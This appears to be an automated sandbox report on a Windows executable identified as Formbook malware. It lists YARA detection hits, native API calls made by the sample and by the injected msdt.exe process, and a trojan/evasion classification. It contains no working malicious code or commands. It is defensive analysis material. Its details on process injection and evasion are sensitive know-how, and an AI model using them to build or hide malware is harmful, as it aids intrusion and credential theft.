          Source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419D50 NtCreateFile,2_2_00419D50
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419E00 NtReadFile,2_2_00419E00
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419E80 NtClose,2_2_00419E80
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,2_2_00419F30
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419D4C NtCreateFile,2_2_00419D4C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419DFD NtReadFile,2_2_00419DFD
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419E7A NtClose,2_2_00419E7A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00419F2B NtAllocateVirtualMemory,2_2_00419F2B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_009F98F0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9840 NtDelayExecution,LdrInitializeThunk,2_2_009F9840
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_009F9860
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F99A0 NtCreateSection,LdrInitializeThunk,2_2_009F99A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_009F9910
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_009F9A00
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9A20 NtResumeThread,LdrInitializeThunk,2_2_009F9A20
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9A50 NtCreateFile,LdrInitializeThunk,2_2_009F9A50
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F95D0 NtClose,LdrInitializeThunk,2_2_009F95D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9540 NtReadFile,LdrInitializeThunk,2_2_009F9540
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_009F96E0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_009F9660
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9780 NtMapViewOfSection,LdrInitializeThunk,2_2_009F9780
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_009F97A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9710 NtQueryInformationToken,LdrInitializeThunk,2_2_009F9710
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F98A0 NtWriteVirtualMemory,2_2_009F98A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9820 NtEnumerateKey,2_2_009F9820
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009FB040 NtSuspendThread,2_2_009FB040
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F99D0 NtCreateProcessEx,2_2_009F99D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9950 NtQueueApcThread,2_2_009F9950
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9A80 NtOpenDirectoryObject,2_2_009F9A80
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9A10 NtQuerySection,2_2_009F9A10
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009FA3B0 NtGetContextThread,2_2_009FA3B0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9B00 NtSetValueKey,2_2_009F9B00
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F95F0 NtQueryInformationFile,2_2_009F95F0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009FAD30 NtSetContextThread,2_2_009FAD30
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9520 NtWaitForSingleObject,2_2_009F9520
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9560 NtWriteFile,2_2_009F9560
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F96D0 NtCreateKey,2_2_009F96D0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9610 NtEnumerateValueKey,2_2_009F9610
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9650 NtQueryValueKey,2_2_009F9650
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F9670 NtQueryInformationProcess,2_2_009F9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04BD9860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9840 NtDelayExecution,LdrInitializeThunk,14_2_04BD9840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD99A0 NtCreateSection,LdrInitializeThunk,14_2_04BD99A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD95D0 NtClose,LdrInitializeThunk,14_2_04BD95D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04BD9910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9540 NtReadFile,LdrInitializeThunk,14_2_04BD9540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD96E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04BD96E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD96D0 NtCreateKey,LdrInitializeThunk,14_2_04BD96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04BD9660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9650 NtQueryValueKey,LdrInitializeThunk,14_2_04BD9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9A50 NtCreateFile,LdrInitializeThunk,14_2_04BD9A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9780 NtMapViewOfSection,LdrInitializeThunk,14_2_04BD9780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9FE0 NtCreateMutant,LdrInitializeThunk,14_2_04BD9FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9710 NtQueryInformationToken,LdrInitializeThunk,14_2_04BD9710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD98A0 NtWriteVirtualMemory,14_2_04BD98A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD98F0 NtReadVirtualMemory,14_2_04BD98F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9820 NtEnumerateKey,14_2_04BD9820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BDB040 NtSuspendThread,14_2_04BDB040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD95F0 NtQueryInformationFile,14_2_04BD95F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD99D0 NtCreateProcessEx,14_2_04BD99D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BDAD30 NtSetContextThread,14_2_04BDAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9520 NtWaitForSingleObject,14_2_04BD9520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9560 NtWriteFile,14_2_04BD9560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9950 NtQueueApcThread,14_2_04BD9950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9A80 NtOpenDirectoryObject,14_2_04BD9A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9A20 NtResumeThread,14_2_04BD9A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9610 NtEnumerateValueKey,14_2_04BD9610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9A10 NtQuerySection,14_2_04BD9A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9A00 NtProtectVirtualMemory,14_2_04BD9A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9670 NtQueryInformationProcess,14_2_04BD9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BDA3B0 NtGetContextThread,14_2_04BDA3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD97A0 NtUnmapViewOfSection,14_2_04BD97A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9730 NtQueryVirtualMemory,14_2_04BD9730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BDA710 NtOpenProcessToken,14_2_04BDA710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9B00 NtSetValueKey,14_2_04BD9B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9770 NtSetInformationFile,14_2_04BD9770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BDA770 NtOpenThread,14_2_04BDA770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD9760 NtOpenProcess,14_2_04BD9760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739D50 NtCreateFile,14_2_00739D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739E00 NtReadFile,14_2_00739E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739E80 NtClose,14_2_00739E80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739F30 NtAllocateVirtualMemory,14_2_00739F30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739D4C NtCreateFile,14_2_00739D4C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739DFD NtReadFile,14_2_00739DFD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739E7A NtClose,14_2_00739E7A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00739F2B NtAllocateVirtualMemory,14_2_00739F2B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040323C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_004048530_2_00404853
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_004061310_2_00406131
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_73CA1A980_2_73CA1A98
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041D82F2_2_0041D82F
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041D1F92_2_0041D1F9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041D4422_2_0041D442
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041DDD32_2_0041DDD3
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00409E2B2_2_00409E2B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00409E302_2_00409E30
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_0041DFE72_2_0041DFE7
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A820A82_2_00A820A8
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CB0902_2_009CB090
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E20A02_2_009E20A0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A710022_2_00A71002
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BF9002_2_009BF900
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D41202_2_009D4120
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A822AE2_2_00A822AE
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EEBB02_2_009EEBB0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7DBD22_2_00A7DBD2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A82B282_2_00A82B28
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C841F2_2_009C841F
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E25812_2_009E2581
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CD5E02_2_009CD5E0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A82D072_2_00A82D07
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B0D202_2_009B0D20
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A81D552_2_00A81D55
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A82EF72_2_00A82EF7
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D6E302_2_009D6E30
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A81FF12_2_00A81FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAB09014_2_04BAB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA841F14_2_04BA841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C5100214_2_04C51002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC258114_2_04BC2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAD5E014_2_04BAD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C61D5514_2_04C61D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B90D2014_2_04B90D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB412014_2_04BB4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B9F90014_2_04B9F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB6E3014_2_04BB6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCEBB014_2_04BCEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073D1F914_2_0073D1F9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00722D9014_2_00722D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00722D8714_2_00722D87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00729E3014_2_00729E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00729E2B14_2_00729E2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_0073DFE714_2_0073DFE7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_00722FB014_2_00722FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04B9B150 appears 32 times
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: String function: 009BB150 appears 35 times
          Source: 5SXTKXCnqS.exe, 00000000.00000003.236258126.0000000009BBF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5SXTKXCnqS.exe
          Source: 5SXTKXCnqS.exe, 00000002.00000002.315714674.0000000002A80000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs 5SXTKXCnqS.exe
          Source: 5SXTKXCnqS.exe, 00000002.00000002.315316837.0000000000C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 5SXTKXCnqS.exe
          Source: 5SXTKXCnqS.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.314505627.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.496732172.0000000000720000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.237002642.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.499467789.00000000047C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.314179672.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.313248208.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.499102168.0000000004680000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240364615.0000000002170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.5SXTKXCnqS.exe.2170000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.5SXTKXCnqS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.5SXTKXCnqS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@2/2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404356
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,0_2_00402020
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_01
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile created: C:\Users\user\AppData\Local\Temp\nsaC26C.tmpJump to behavior
          Source: 5SXTKXCnqS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 5SXTKXCnqS.exeVirustotal: Detection: 30%
          Source: 5SXTKXCnqS.exeReversingLabs: Detection: 29%
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeFile read: C:\Users\user\Desktop\5SXTKXCnqS.exeJump to behavior
